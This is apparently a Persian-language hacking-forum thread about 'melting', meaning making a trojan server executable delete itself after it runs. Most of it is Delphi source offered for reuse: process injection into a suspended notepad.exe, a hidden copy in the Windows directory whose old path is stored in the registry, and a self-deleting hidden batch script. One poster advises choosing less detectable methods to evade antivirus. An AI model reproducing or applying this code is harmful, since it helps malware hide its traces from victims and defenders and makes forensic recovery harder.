
نسخه‌ی کامل: melt after install
می‌شه روش‌های melt فایل رو بعد از اجرا بگین؟ لطفاً. مرسی
این یک روش melt با استفاده از injection می‌باشد.

کد:
program Inj;

uses
  Windows;

var
  // Full path of the running executable. Filled by MeltFile (GetModuleFileName)
  // and later handed to DeleteFile by MeltProc.
  sBuff:    array[0..255] of Char;

{$R *.res}

// Routine whose address becomes the new entry point of the injected thread
// (see InjectCode / MeltFile). The whole image of this program is copied into
// the target, so this body runs inside the other process and reads that
// process's copy of sBuff — the path recorded before the injection.
// Behaviour: waits 500 ms, then deletes the original executable. The deletion
// is therefore performed by the host process (notepad.exe in MeltFile), not by
// this program — worth keeping in mind when correlating file-deletion telemetry.
procedure MeltProc();
begin
  Sleep(500);        // presumably to let the original process exit first
  DeleteFile(sBuff);
end;

// Starts szProcessName suspended, copies this program's own in-memory image
// into it at the same base address, and redirects the new process's main
// thread to pFunction before resuming it.
//
// szProcessName  command line handed to CreateProcess.
// pFunction      address (inside this image) that the hijacked thread starts at.
// Returns        declared Boolean, but Result is never assigned anywhere in the
//                body, so callers cannot rely on the return value.
//
// x86-only: the 64- and 248-byte copies match the 32-bit DOS/NT header sizes
// and the thread context is patched through the 32-bit Eip field.
// From a detection standpoint this is the classic suspended-process /
// RWX VirtualAllocEx / WriteProcessMemory / SetThreadContext / ResumeThread
// sequence that process-injection monitoring looks for.
function InjectCode(szProcessName:string; pFunction:Pointer):Boolean;
var
  STARTINFO:  TStartupInfo;
  PROCINFO:   TProcessInformation;
  pFunc:      Pointer;       // unused
  dSize:      DWORD;         // SizeOfImage of this module
  pInjected:  Pointer;       // remote allocation (requested at this module's base)
  dWritten:   DWORD;
  CONTEXT:    TContext;
  hMod:       THandle;       // base address of this executable's image
  IDH:        TImageDosHeader;
  INH:        TImageNtHeaders;
begin
  FillChar(STARTINFO, SizeOf(TStartupInfo), #0);
  STARTINFO.cb := SizeOf(TStartupInfo);
  // CREATE_SUSPENDED: the target's main thread exists but has not run yet.
  if CreateProcess(nil, PChar(szProcessName),  nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, STARTINFO, PROCINFO) then
  begin
    hMod := GetModuleHandle(nil);
    // Read our own DOS header (64 bytes) and validate the 'MZ' signature.
    CopyMemory(@IDH, Pointer(hMod), 64);
    if IDH.e_magic = IMAGE_DOS_SIGNATURE then
    begin
      // Read our own NT headers (248 bytes, 32-bit layout) at e_lfanew.
      CopyMemory(@INH, Pointer(hMod + IDH._lfanew), 248);
      if INH.Signature = IMAGE_NT_SIGNATURE then
      begin
        dSize := INH.OptionalHeader.SizeOfImage;
        // Reserve+commit an RWX region in the target at our own base address,
        // then copy the entire mapped image of this program into it.
        pInjected := VirtualAllocEx(PROCINFO.hProcess, Ptr(hMod), dSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(PROCINFO.hProcess, pInjected, Ptr(hMod), dSize, dWritten);
        // Point the suspended main thread's instruction pointer at pFunction
        // (same address in both processes because the copy sits at hMod).
        CONTEXT.ContextFlags := CONTEXT_FULL;
        GetThreadContext(PROCINFO.hThread, CONTEXT);
        CONTEXT.Eip := DWORD(pFunction);
        SetThreadContext(PROCINFO.hThread, CONTEXT);
        ResumeThread(PROCINFO.hThread);
      end;                
    end;
  end;
end;

// Performs the melt: stores this executable's path in the global sBuff
// (256 chars, matching the declared buffer) and injects the image into a
// newly started notepad.exe with MeltProc as the hijacked thread's entry.
// The return value of InjectCode is ignored.
procedure MeltFile();
begin
  GetModuleFileName(0, sBuff, 256);
  InjectCode('notepad.exe', @MeltProc);
end;

// Program body: run the melt and exit. The file itself is removed later by the
// injected process, after the 500 ms delay in MeltProc.
begin
  MeltFile;
end.
ملت سرور از طریق اینجکشن خیلی روش قشنگیه، ولی آنتی خیلی به این چیزا گیر می‌ده. قبلاً تست کردم؛ واسه همین بهتره از روشی که غیرقابل شناسایی‌تره استفاده بشه.
ممنون مبین جان.

کد:
program melt;



uses
windows;

var
// theoldfile: path read back from the registry (where this program ran from before);
// ournewfile: target path of the copy inside the Windows directory.
theoldfile,ournewfile:string;


// Manual import of ShellExecuteA from shell32.dll (only the Windows unit is used,
// not ShellAPI). Called from the main block to launch the copied executable.
function ShellExecuteA(hWnd: LongWord; Operation, FileName, Parameters, Directory: PAnsiChar; ShowCmd: Integer): HINST; stdcall; external 'shell32.dll';

// Creates (or opens) subkey below key and stores value as a REG_EXPAND_SZ
// string named name. Returns True only when RegSetValueEx reports success;
// the result of RegCreateKey itself is not checked. The byte count passed is
// length(value), i.e. the string without its terminating #0.
function WriteToReg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;


// Reads the string value Value under Key\Path and returns it, or Default when
// the key cannot be opened or the value is missing.
// Note: the key is opened with KEY_ALL_ACCESS although only a read is done —
// more rights than the operation needs. The value is queried twice: first to
// learn DataSize, then into Result; SetLength(Result, DataSize-1) drops the
// trailing #0 counted in DataSize.
Function ReadFromReg(Key:HKEY;Path:string;Value,Default:string):string;
Var
  Handle:HKEY;
  RegType:integer;
  DataSize:integer;
begin
  Result:=Default;
  if (RegOpenKeyEx(Key,pchar(Path),0,KEY_ALL_ACCESS,Handle)=ERROR_SUCCESS) then begin
   if RegQueryValueEx(Handle,pchar(Value),nil,@RegType,nil,@DataSize)=ERROR_SUCCESS then begin
    SetLength(Result,Datasize);
    RegQueryValueEx(Handle,pchar(Value),nil,@RegType,PByte(pchar(Result)),@DataSize);
    SetLength(Result,Datasize-1);
   end;
   RegCloseKey(Handle);
  end;
end;


// Returns the Windows directory with a trailing backslash.
// The local buffer holds 1025 chars but GetWindowsDirectory is told it is
// only 56 chars long; the two sizes disagree.
function getwindir():string;
var
windir:array [0..1024] of char;
begin
  getwindowsdirectory(windir,56);
  result:=string(windir)+'\';
end;


// Program body. Two runs are told apart by comparing the running path
// (ParamStr(0)) with the copy's path in the Windows directory:
//  * first run (original location): delete whatever path was stored earlier in
//    HKCU\Software\Microsoft\Windows\CurrentVersion\settings\LocationOld, store
//    the current path there, copy this executable to <windir>\copyofMelt.exe,
//    start that copy through ShellExecuteA and exit;
//  * second run (from the copy): delete the stored original path and stay resident.
// Either way the surviving process then sleeps forever doing nothing.
// Artifacts left behind: the LocationOld registry value and copyofMelt.exe in
// the Windows directory (the copy needs write access to that directory).
begin

theoldfile:=readfromreg(HKEY_current_user,'Software\Microsoft\Windows\CurrentVersion\settings','LocationOld','DIDNT FIND ANYTHING') ;
ournewfile:=getwindir+'copyofMelt.exe';


if paramstr(0) <> ournewfile  then begin

// Not running from the copy: remove the previously recorded location first.
deletefile(pchar(theoldfile));



writetoreg(HKEY_current_user,'Software\Microsoft\Windows\CurrentVersion\settings','LocationOld',paramstr(0));


Copyfile(pchar(paramstr(0)),pchar(ournewfile),false);


// Launch the copy (ShowCmd 0 = hidden window) and terminate this instance.
shellexecuteA(0,nil,pchar(OurNewFile),nil,nil,0);
halt(0)
end

else begin
// Running from the copy: delete the original whose path was stored above.
deletefile(pchar(theoldfile));
end;


// Keep the process alive indefinitely.
while true do sleep(1000);

end.
این هم یک روش دیگه

کد:
// Self-deletion through a helper batch script. This snippet has no uses clause;
// it relies on names from Windows, SysUtils, Classes and Dialogs.
// Flow: obtain a temp file name, clear the executable's attributes, write a
// batch that deletes ParamStr(0) in a loop until it is gone, removes its
// directory (plain rmdir, so only if the directory is empty) and finally
// deletes the batch itself; then run the batch hidden and Halt — presumably so
// the executable is no longer locked when the batch's del runs.
// Artifacts: GetTempFileName with unique=0 creates a uis*.tmp file on disk and
// only the name is changed to .bat, so the empty .tmp remains; plus the .bat,
// an "Uninstalling program..." message box, and a hidden process started via WinExec.
procedure DeleteEXE;

  // Returns the user's temp directory (GetTempPath output as a string).
  function GetTmpDir: string;
  var
    pc: PChar;
  begin
    pc := StrAlloc(MAX_PATH + 1);
    GetTempPath(MAX_PATH, pc);
    Result := string(pc);
    StrDispose(pc);
  end;

  // Creates a unique temp file with prefix 'uis' in GetTmpDir and returns its
  // name with the extension replaced by ext (the created .tmp is not renamed).
  function GetTmpFileName(ext: string): string;
  var
    pc: PChar;
  begin
    pc := StrAlloc(MAX_PATH + 1);
    GetTempFileName(PChar(GetTmpDir), 'uis', 0, pc);
    Result := string(pc);
    Result := ChangeFileExt(Result, ext);
    StrDispose(pc);
  end;
  
var
  batchfile: TStringList;
  batchname: string;
begin
  batchname := GetTmpFileName('.bat');
  // Clear read-only/hidden/system attributes so del can remove the file.
  FileSetAttr(ParamStr(0), 0);
  batchfile := TStringList.Create;
  with batchfile do
  begin
    try
      Add(':Label1');
      Add('del "' + ParamStr(0) + '"');
      Add('if Exist "' + ParamStr(0) + '" goto Label1');   // retry until the exe is gone
      Add('rmdir "' + ExtractFilePath(ParamStr(0)) + '"');
      Add('del ' + batchname);                                // batch removes itself (name unquoted)
      SaveToFile(batchname);
      ChDir(GetTmpDir);
      ShowMessage('Uninstalling program...');
      WinExec(PChar(batchname), SW_HIDE);
    finally
      batchfile.Free;
    end;
    // Still inside the with-block, but batchfile is not referenced after Free.
    Halt;
  end;
end;